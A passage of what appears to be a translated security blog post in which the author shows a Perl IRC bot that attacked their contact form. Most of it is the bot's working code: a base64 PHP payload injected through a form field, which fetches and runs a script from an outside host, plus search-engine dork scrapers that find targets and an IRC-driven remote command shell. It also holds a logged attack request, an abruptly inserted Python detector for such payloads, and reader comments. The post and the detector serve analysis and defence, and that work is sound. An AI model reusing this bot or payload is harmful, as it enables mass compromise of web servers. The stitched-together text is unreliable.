    my $code = "ICRjbWQ9ImNkIC90bXA7d2dldCBodHRwOi8vMHg2OS5uZXQvbG9nO3BlcmwgbG9nO3BlcmwgbG9nO3JtIC1yZiBsb2ciOw0KJGVzZWd1aWNtZD1leCgkY21kKTsNCmVjaG8gJGVzZWd1aWNtZDsNCmZ1bmN0aW9uIGV4KCRjZmUpew0KJHJlcyA9ICcnOw0KaWYgKCFlbXB0eSgkY2ZlKSl7DQppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSl7DQpAZXhlYygkY2ZlLCRyZXMpOw0KJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7DQokcmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSl7DQpAb2Jfc3RhcnQoKTsNCkBzeXN0ZW0oJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7DQpAb2Jfc3RhcnQoKTsNCkBwYXNzdGhydSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRjZmUsInIiKSkpew0KJHJlcyA9ICIiOw0Kd2hpbGUoIUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KQHBjbG9zZSgkZik7DQp9fQ0KcmV0dXJuICRyZXM7DQp9IA==";

    my $req = HTTP::Request->new(POST => $url);

    $req->content_type('application/x-www-form-urlencoded');

    $req->content("send-contactus=1&author_name=
PHP Code:
eval(base64_decode('".$code."'));die;
");

    my $ua = LWP::UserAgent->new(agent => $uagent);

    $ua->timeout(10);

    my $res = $ua->request($req);

}

######################################### SEARCH ENGINE

sub google() {

    my @list;

    my $key = $_[0];

    for (my $i=0; $i<=1000; $i+=100){

        my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i);

        my $res = search_engine_query($search);

        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

            my $link = $1;

            if ($link !~ /google/){

                my @grep = links($link);

                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub alltheweb() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100) {
        my $search = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g) {
            my $link = $1;
            $link =~ s/ //g;
            my @grep = links($link);
            push(@list,@grep);
        }
    }
    return @list;
}

sub uol() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=1000; $i+=10) {
        my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
            my $link = $1;
            if ($link !~ /busca|uol|yahoo/) {
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub bing() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=1000; $i+=10) {
        my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE");
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
            my $link = $1;
            if ($link !~ /msn|live|bing/) {
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub altavista() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=1000; $i+=10){
        my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<span class=ngrn>(.+?)\//g) {
            my $link = $1;
            if ($link !~ /altavista/){
                $link =~ s/<//g;
                $link =~ s/ //g;
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub ask() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=10) {
        my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
            my $link = $1;
            if ($link !~ /ask\.com/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub yahoo() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=500; $i+=1) {
        my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/26u=(.*?)%26w=/g) {
            my $link = $1;
            if ($link!~ /yahoo/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

#########################################

sub clean() {
    my @cln = ();
    my %visit = ();
    foreach my $element (@_) {
        $element =~ s/\/+/\//g;
        next if $visit{$element}++;
        push @cln, $element;
    }
    return @cln;
}

sub key() {
    my $dork = $_[0];
    $dork =~ s/ /\+/g;
    $dork =~ s/:/\%3A/g;
    $dork =~ s/\//\%2F/g;
    $dork =~ s/&/\%26/g;
    $dork =~ s/\"/\%22/g;
    $dork =~ s/,/\%2C/g;
    $dork =~ s/\\/\%5C/g;
    return $dork;
}

sub links() {
    my @list;
    my $link = $_[0];
    my $host = $_[0];
    my $hdir = $_[0];
    $hdir =~ s/(.*)\/[^\/]*$/\1/;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $host .= "/";
    $link .= "/";
    $hdir .= "/";
    $host =~ s/\/\//\//g;
    $hdir =~ s/\/\//\//g;
    $link =~ s/\/\//\//g;
    push(@list,$link,$host,$hdir);
    return @list;
}

sub search_engine_query() {
    my $url = $_[0];
    $url =~ s/http:\/\///;
    my $host = $url;
    my $query = $url;
    my $page  = "";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~ s/$host//;
    if ($query eq "") { $query = "/"; }
        eval {
            my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
            print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
            my @pages = <$sock>;
            $page = "@pages";
            close($sock);
        };
    return $page;
}

#########################################

sub shell() {
    my $path = $_[0];
    my $cmd = $_[1];
    if ($cmd =~ /cd (.*)/) {
        chdir("$1") || &msg("$path","No such file or directory");
        return;
    }
    elsif ($pid = fork) { waitpid($pid, 0); }
    else { if (fork) { exit; } else {
        my @output = `$cmd 2>&1 3>&1`;
        my $c = 0;
        foreach my $output (@output) {
            $c++;
            chop $output;
            &msg("$path","$output");
            if ($c == 5) { $c = 0; sleep 3; }
        }
        exit;
    }}
}

sub isAdmin() {
    my $status = 0;
    my $nick = $_[0];
    if ($nick eq $admin) { $status = 1; }
    return $status;
}

sub msg() {
    return unless $#_ == 1;
    sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}

sub nick() {
    return unless $#_ == 0;
    sendraw("NICK $_[0]");
}

sub notice() {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
}
[/codesyntax]

I honestly don't know much Perl, but it looks like a backdoor, judging by the $fakeproc.

Well, I don't know about anything else, but I'm really happy with my security system against this kind of attack haha.

174.122.183.58
3a.b7.7aae.static.theplanet.com 

2011-05-08 17:36:33

POST /contact.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.durkh3im.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1008
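The author decoded the base64 by hand to see what the submitted payload did. As an added example (not the blog's own filter, whose workings the post does not describe), here is a Python check a defender could run on a contact form's POST body, or on saved request bodies like the one logged above: it finds `eval(base64_decode(...))` constructs, decodes them, and reports which OS-execution functions the hidden PHP calls and whether it fingerprints the host with `php_uname()`. The form body, the field names and the harmless PHP inside the sample are constructed for this example; the backslash-escaped quotes mimic what magic quotes did to the payload in the log.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import parse_qs, urlencode

# eval(base64_decode('...')) with the quotes optionally backslash-escaped, as in
# the blog's log where magic quotes turned ' into \'.  Whitespace is allowed
# inside the base64 because pasted payloads often wrap across lines.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\\?['\"]([A-Za-z0-9+/=\s]+)\\?['\"]\s*\)\s*\)",
    re.IGNORECASE,
)

# PHP functions that hand a string to the operating system.  The decoded payload
# on this page probes exec, shell_exec, system, passthru and popen in turn.
EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")


@dataclass
class Finding:
    field_name: str          # which form field carried the payload
    decoded: str             # the PHP source hidden inside the base64
    exec_funcs: List[str] = field(default_factory=list)
    calls_php_uname: bool = False


def decode_b64_loose(s: str) -> Optional[str]:
    """Decode base64 that may contain line breaks; None if it is not valid base64."""
    cleaned = re.sub(r"\s+", "", s)
    try:
        raw = base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def inspect_value(field_name: str, value: str) -> List[Finding]:
    """One Finding per eval(base64_decode(...)) construct found in a field value."""
    findings = []
    for m in EVAL_B64.finditer(value):
        decoded = decode_b64_loose(m.group(1))
        if decoded is None:
            continue
        f = Finding(field_name=field_name, decoded=decoded)
        for fn in EXEC_FUNCS:
            # \b keeps "exec(" from matching inside "shell_exec("; requiring "("
            # keeps a function_exists('exec') probe from counting as a call.
            if re.search(r"\b" + fn + r"\s*\(", decoded):
                f.exec_funcs.append(fn)
        f.calls_php_uname = "php_uname" in decoded
        findings.append(f)
    return findings


def inspect_form_body(body: str) -> List[Finding]:
    """Decode an application/x-www-form-urlencoded body and inspect every field."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            findings.extend(inspect_value(name, v))
    return findings


def summarize(body: str) -> dict:
    """Compact verdict suitable for a log line or an alert."""
    findings = inspect_form_body(body)
    return {
        "blocked": bool(findings),
        "fields": sorted({f.field_name for f in findings}),
        "exec_funcs": sorted({fn for f in findings for fn in f.exec_funcs}),
        "fingerprints_host": any(f.calls_php_uname for f in findings),
    }


# Constructed sample (not the logged payload): same shape, harmless command.
SAMPLE_PHP = (
    'echo "sys:".php_uname()."<br>";\n'
    '$cmd="echo test";\n'
    'if(function_exists(\'exec\')){@exec($cmd,$res);}\n'
    'elseif(function_exists(\'system\')){@system($cmd);}\n'
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PHP.encode()).decode()
SAMPLE_BODY = urlencode({
    "name": "visitor",
    "email": "visitor@example.invalid",
    "message": "eval(base64_decode(\\'" + SAMPLE_B64 + "\\'));die();",
})
CLEAN_BODY = urlencode({"name": "visitor", "message": "hello, nice blog"})

if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_BODY), ("clean", CLEAN_BODY)):
        print(label, summarize(body))
```

Decoding the payload before matching matters: a filter that only looks for `exec` or `system` in the raw body sees nothing but base64, which is exactly why the attacker encoded it. Running the check on the decoded text reports the same function list the author found by hand.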


Cheers!!

Matías Moreno Cárdenas

Posted by: Matías Moreno Cárdenas

IT security analyst and ethical hacker / multiplatform software developer. Currently an IT security and ethical hacking analyst at Grupo SIA.

  1. hahahahaha

     what noobs, attacking out of envy Durk xDD

     eh xD

     oh well.. let them be

     cheers!

  2. Hahaha bunch of idiots attacking you. They can't do anything HAHAHA.

     Nice system, cheers

     Wocar

  3. hahahaha what a lamer